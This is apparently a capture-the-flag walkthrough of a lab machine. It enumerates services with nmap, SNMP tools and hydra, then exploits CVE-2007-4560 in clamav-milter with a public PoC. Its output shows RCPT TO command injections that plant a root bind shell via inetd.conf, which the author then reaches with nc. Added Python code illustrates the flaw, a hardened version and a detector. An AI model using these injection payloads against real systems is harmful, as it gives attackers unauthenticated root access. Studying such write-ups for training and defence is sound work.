PG - ClamAV
Recon discovers SNMP running and a clamav-milter process; exploiting CVE-2007-4560 in ClamAV's clamav-milter achieves unauthenticated remote code execution as root.
Recon
nmap discovered several open ports, including SSH, SMTP, HTTP and SMB.
nmap -Pn -sV -sC -vvv "$TARGET"
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 303ea4135f9a32c08e46eb26b35eee6d (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBALr/RyBq802QXa1Bh4SQEUHqD+p9TEx3SUvPHACbT0tQqR3aali+ifDiOpqMToVaRfWzYOOsoM2Neg0EPa4KsJIwSTkFqjd/3Ynp3Yzus0nN+gtmbQRKzo8QfStr6IGt6kaI6viXl4z3ww6ryEkjNnb74KCooHOjy
eGPi3o89GVnAAAAFQDSg0dwMrSn9juW/XPvo8S8kVOhDQAAAIARaqFuvZCqiTY8i/PITsr5WvyZm8mQ0nuqB6gW6y1h4jDAvtHO4TIZEMJ5vtPst0w9mVSYGVFlukhCqhbJdBigqH1WB1p7kwC78M9k23zZmzuwbnzYPiLHpEdfFEWdO62ZoCSFBXWOqe1I
ZaTaRCgUZPeB1QFXRCQ96VrJizPLUAAAAIEArOALxR78fZrUqmUcYOs5tf8wu5xChAUqAfh1ElJ6r3EjcWwXId12jo1uAz0JmCTluUQhjhNDJB6XIgUzoFzW1NZPjGCkex7s1+2+TUTmqFr6Nr97k2RIy91Bpuxwg5jzE83cKPCOoWVbYlfzAqNkF4xxznf
C3fRtmj2e/L9chzg=
| 1024 afa2493ed8f226124aa0b5ee6276b018 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAviGcDkDxKzv7w++DXy6q+5AJDpG/q8Um8j4BheW9fgwsOvQCuDvLcPUIKMYEz4aUgkt/sSCXu29XTlu79pEkb48+BnaRCKrHLH/YWM79GT6Q5ie9jP47HjjJeCCBI/c02qpkH/fjz9FK4HQPC7WtXY9Eg
W4IMB+pzX2KZxK2PF0=
25/tcp open smtp? syn-ack ttl 61
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http syn-ack ttl 61 Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-title: Ph33r
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open smux syn-ack ttl 61 Linux SNMP multiplexer
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open ssh syn-ack ttl 61 OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 303ea4135f9a32c08e46eb26b35eee6d (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBALr/RyBq802QXa1Bh4SQEUHqD+p9TEx3SUvPHACbT0tQqR3aali+ifDiOpqMToVaRfWzYOOsoM2Neg0EPa4KsJIwSTkFqjd/3Ynp3Yzus0nN+gtmbQRKzo8QfStr6IGt6kaI6viXl4z3ww6ryEkjNnb74KCooHOjy
eGPi3o89GVnAAAAFQDSg0dwMrSn9juW/XPvo8S8kVOhDQAAAIARaqFuvZCqiTY8i/PITsr5WvyZm8mQ0nuqB6gW6y1h4jDAvtHO4TIZEMJ5vtPst0w9mVSYGVFlukhCqhbJdBigqH1WB1p7kwC78M9k23zZmzuwbnzYPiLHpEdfFEWdO62ZoCSFBXWOqe1I
ZaTaRCgUZPeB1QFXRCQ96VrJizPLUAAAAIEArOALxR78fZrUqmUcYOs5tf8wu5xChAUqAfh1ElJ6r3EjcWwXId12jo1uAz0JmCTluUQhjhNDJB6XIgUzoFzW1NZPjGCkex7s1+2+TUTmqFr6Nr97k2RIy91Bpuxwg5jzE83cKPCOoWVbYlfzAqNkF4xxznf
C3fRtmj2e/L9chzg=
| 1024 afa2493ed8f226124aa0b5ee6276b018 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAviGcDkDxKzv7w++DXy6q+5AJDpG/q8Um8j4BheW9fgwsOvQCuDvLcPUIKMYEz4aUgkt/sSCXu29XTlu79pEkb48+BnaRCKrHLH/YWM79GT6Q5ie9jP47HjjJeCCBI/c02qpkH/fjz9FK4HQPC7WtXY9Eg
W4IMB+pzX2KZxK2PF0=
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Based on the OpenSSH version string, the host is likely running Debian, which means this is a Linux machine.
A null session is accepted on SMB, but I am unable to connect to the shares. The HTTP web page shows a bunch of 1's and 0's.
It is binary-encoded text; I used CyberChef to convert it from binary and got the string below.
ifyoudontpwnmeuran00b
Interesting.
Let's scan UDP ports as well, since this is a very important part of recon, especially in the OSCP.
sudo nmap -Pn -sU -sV -vvv -p 161,162 --script=snmp-netstat,snmp-processes "$TARGET"
161/udp open snmp udp-response ttl 61 SNMPv1 server; U.C. Davis, ECE Dept. Tom SNMPv3 server (public)
| snmp-info:
| enterprise: U.C. Davis, ECE Dept. Tom
| engineIDFormat: unknown
| engineIDData: 9e325869f30c7749
| snmpEngineBoots: 60
|_ snmpEngineTime: 2h53m41s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| eth0
| IP address: 192.168.240.42 Netmask: 255.255.255.0
|_ Type: ethernetCsmacd Speed: 100 Mbps
| snmp-netstat:
| TCP 0.0.0.0:25 0.0.0.0:0
| TCP 0.0.0.0:80 0.0.0.0:0
| TCP 0.0.0.0:139 0.0.0.0:0
| TCP 0.0.0.0:199 0.0.0.0:0
| TCP 0.0.0.0:445 0.0.0.0:0
| UDP 0.0.0.0:137 *:*
| UDP 0.0.0.0:138 *:*
| UDP 0.0.0.0:161 *:*
| UDP 42.240.168.192:137 *:*
|_ UDP 42.240.168.192:138 *:*
| snmp-processes:
| 1:
| Name: init
| Path: init [2]
| 2:
| Name: ksoftirqd/0
| Path: ksoftirqd/0
| 3:
| Name: events/0
| Path: events/0
| 4:
| Name: khelper
| Path: khelper
| 5:
| Name: kacpid
| Path: kacpid
| 99:
| Name: kblockd/0
| Path: kblockd/0
| 109:
| Name: pdflush
| Path: pdflush
| 110:
| Name: pdflush
| Path: pdflush
| 111:
| Name: kswapd0
| Path: kswapd0
| 112:
| Name: aio/0
| Path: aio/0
| 255:
| Name: kseriod
| Path: kseriod
| 276:
| Name: scsi_eh_0
| Path: scsi_eh_0
| 284:
| Name: khubd
| Path: khubd
| 348:
| Name: shpchpd_event
| Path: shpchpd_event
| 380:
| Name: kjournald
| Path: kjournald
| 935:
| Name: vmmemctl
| Path: vmmemctl
| 1178:
| Name: vmtoolsd
| Path: /usr/sbin/vmtoolsd
| 3770:
| Name: syslogd
| Path: /sbin/syslogd
| 3773:
| Name: klogd
| Path: /sbin/klogd
| 3777:
| Name: clamd
| Path: /usr/local/sbin/clamd
| 3779:
| Name: clamav-milter
| Path: /usr/local/sbin/clamav-milter
| Params: --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
...[snip]...
| snmp-sysdescr: Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
|_ System uptime: 2h53m40.84s (1042084 timeticks)
1105/udp open|filtered ftranhc no-response
Service Info: Hosts: 0XBABE, 0xbabe.local
There is SNMP running on port 161!
Furthermore, there is one interesting process, PID 3779, which is running clamav-milter:
| 3779:
| Name: clamav-milter
| Path: /usr/local/sbin/clamav-milter
| Params: --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
I'll try hydra to brute-force the SNMP community string.
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt "$TARGET" snmp
[161][snmp] host: 192.168.240.42 password: public
I got the SNMP community string public.
I then use snmp-check with the public community string to enumerate for any new information.
snmp-check -c public "$TARGET"
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 192.168.240.42:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 192.168.240.42
Hostname : 0xbabe.local
Description : Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
Contact : Root <root@localhost> (configure /etc/snmp/snmpd.local.conf)
Location : Unknown (configure /etc/snmp/snmpd.local.conf)
Uptime snmp : 03:06:35.00
Uptime system : 03:05:57.00
System date : 2024-12-23 05:21:53.0
[*] Network information:
...[snip]...
[*] Processes:
Id Status Name Path Parameters
1 runnable init init [2]
2 runnable ksoftirqd/0 ksoftirqd/0
3 runnable events/0 events/0
4 runnable khelper khelper
5 runnable kacpid kacpid
99 runnable kblockd/0 kblockd/0
109 runnable pdflush pdflush
110 runnable pdflush pdflush
111 runnable kswapd0 kswapd0
112 runnable aio/0 aio/0
255 runnable kseriod kseriod
276 runnable scsi_eh_0 scsi_eh_0
284 runnable khubd khubd
348 runnable shpchpd_event shpchpd_event
380 runnable kjournald kjournald
935 runnable vmmemctl vmmemctl
1178 runnable vmtoolsd /usr/sbin/vmtoolsd
3770 running syslogd /sbin/syslogd
3773 runnable klogd /sbin/klogd
3777 runnable clamd /usr/local/sbin/clamd
3779 runnable clamav-milter /usr/local/sbin/clamav-milter --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
...[snip]...
I can see that process 3779 is running clamav-milter with --black-hole-mode, the same result as the nmap scan earlier.
Exploitation
I'll look for an exploit.
It turns out that this version is affected by CVE-2007-4560, a vulnerability in ClamAV's clamav-milter when configured with --black-hole-mode. In this mode, recipient addresses are passed unsanitized to popen(), allowing an attacker to inject shell metacharacters via the RCPT TO field of an SMTP transaction, leading to unauthenticated remote command execution on the mail server.
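To make the flaw concrete from the defender's side, here is an added example (my own code, not ClamAV's source and not the PoC used below): the weak pattern of interpolating a recipient into a popen() command string, next to a hardened form that validates the address against a strict allow-list and builds an argv vector for an exec-style call so the recipient can never become command syntax, plus a small detector that flags recipients carrying shell metacharacters in sendmail "Recipient ok" replies. The `sendmail -bv` command line, the allow-list regex and the sample transcript are assumptions constructed for illustration.

```python
import re

# Characters that /bin/sh treats specially. A recipient containing any of
# them must never be spliced into a command string that reaches popen().
SHELL_META = frozenset('|&;<>()$`\\"\'*?[]{}#~ \t\n')

# Deliberately conservative allow-list for addresses handed to an external
# program. Stricter than RFC 5321 (which permits quoted local parts) on purpose.
SAFE_ADDR = re.compile(r'^[A-Za-z0-9._+-]+@[A-Za-z0-9.-]+$')

# sendmail-style positive reply to RCPT TO:
#   250 2.1.5 <user@example.org>... Recipient ok
RCPT_OK = re.compile(r'^250 2\.1\.5 <(?P<addr>.*)>\.\.\. Recipient ok$')


def shell_meta_in(addr):
    """Return the sorted list of shell metacharacters present in addr."""
    return sorted(c for c in set(addr) if c in SHELL_META)


def is_safe_recipient(addr):
    """True only if addr matches the conservative allow-list."""
    return SAFE_ADDR.match(addr) is not None


def vulnerable_command(addr):
    """The weak pattern the write-up describes: the sender-controlled recipient
    is interpolated into a shell command string. Handed to popen(), anything
    after a '|' or ';' in addr runs as a separate command.
    (Hypothetical 'sendmail -bv' invocation; not the milter's real command line.)"""
    return f"sendmail -bv {addr}"


def hardened_argv(addr):
    """Hardened form: validate first, then build an argument vector for
    subprocess.run(argv) with no shell. The recipient is always exactly one
    argument and can never alter the command structure."""
    if not is_safe_recipient(addr):
        raise ValueError(
            f"rejected recipient with shell metacharacters: {shell_meta_in(addr)}")
    return ["sendmail", "-bv", addr]


def flag_suspicious_rcpt(transcript_lines):
    """Scan sendmail 'Recipient ok' replies and return recipients that carry
    shell metacharacters. On a black-hole-mode milter that is the signature
    of CVE-2007-4560 abuse and is worth alerting on from mail logs."""
    flagged = []
    for line in transcript_lines:
        m = RCPT_OK.match(line.strip())
        if m and shell_meta_in(m.group("addr")):
            flagged.append(m.group("addr"))
    return flagged


# Constructed sample transcript, shaped like the sendmail replies in this write-up.
SAMPLE_TRANSCRIPT = [
    "250 2.1.0 <>... Sender ok",
    "250 2.1.5 <alice@example.org>... Recipient ok",
    '250 2.1.5 <nobody+"|id"@localhost>... Recipient ok',
    '354 Enter mail, end with "." on a line by itself',
]

if __name__ == "__main__":
    for addr in ("alice@example.org", 'nobody+"|id"@localhost'):
        verdict = "safe" if is_safe_recipient(addr) else "REJECT"
        print(f"{addr!r}: {verdict} {shell_meta_in(addr)}")
    print("flagged recipients:", flag_suspicious_rcpt(SAMPLE_TRANSCRIPT))
```

The allow-list is intentionally narrower than what SMTP permits: the goal is not to validate e-mail addresses in general, but to bound what an external program can ever receive as an argument, with the argv form removing the shell from the path entirely.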
I searched for a PoC related to the CVE and found this one on GitHub, which works relatively well.
git clone https://github.com/Sic4rio/-Sendmail-with-clamav-milter-0.91.2---Remote-Command-Execution
cd -Sendmail-with-clamav-milter-0.91.2---Remote-Command-Execution
Give execute permission to the exploit:
chmod +x exploit.py
I’ll run the exploit.
python exploit.py "$TARGET"
________ ___ _ __
/ ____/ /___ _____ ___ / | | / /
/ / / / __ `/ __ `__ \/ /| | | / /
/ /___/ / /_/ / / / / / / ___ | |/ /
\____/_/\__,_/_/ /_/ /_/_/ |_|___/
_.-''|''-._
.-' | `-.
.'\ | /`.
.' \ | / `.
\ \ | / /
`\ \ | / /'
`\ \ | / /'
`\ \ | / /'
_.-`\ \ | / /'-._
{_____`\|//'_____}
`-'
Clam AntiVirus 'clamav-milter' Remote Code Execution Exploit
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Remix (C) 2023 SICARIO
Attacking 192.168.114.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Tue, 5 Aug 2025 14:48:05 -0400; (No UCE/UBE) logging access from: [192.168.45.156](TEMP)-[192.168.45.156]
250-localhost.localdomain Hello [192.168.45.156], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf"@localhost>... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart"@localhost>... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 575Im5AF004325 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
Now I can connect to the target machine's bind shell and get code execution as root.
nc -nv "$TARGET" 31337
You may need to run the exploit again if you are unable to connect to the bind shell.
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.114.42:31337.
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
